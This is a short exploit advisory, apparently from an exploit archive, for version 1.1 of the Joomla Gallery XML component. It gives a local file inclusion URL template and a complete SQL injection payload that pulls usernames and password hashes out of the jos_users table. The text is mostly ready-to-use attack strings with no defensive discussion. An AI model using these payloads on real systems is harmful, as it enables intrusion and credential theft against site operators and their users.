Joomla Component com_galleryxml Multiple Vulnerabilities

========================================================
Joomla Component com_galleryxml Multiple Vulnerabilities
========================================================


# Exploit Title: Joomla Component Gallery XML 1.1 Multiple Vulnerabilities
# Date: 18 May 2010
# Author: jdc
# Software Link:
http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/12504
# Version: 1.1
# Tested on: PHP5, MySQL5
 
Local File Include
------------------
 
?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1
 
 
SQL Injection
-------------
 
?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union
select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from
jos_users -- '



#  0day.today [2018-03-05]  #